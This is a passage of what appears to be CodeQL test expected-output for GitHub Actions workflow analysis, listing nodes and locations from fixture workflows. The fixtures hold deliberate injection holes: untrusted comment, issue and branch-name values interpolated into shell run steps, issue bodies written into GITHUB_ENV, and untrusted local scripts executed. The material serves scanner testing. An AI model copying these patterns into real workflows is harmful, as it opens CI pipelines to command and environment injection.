.github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | 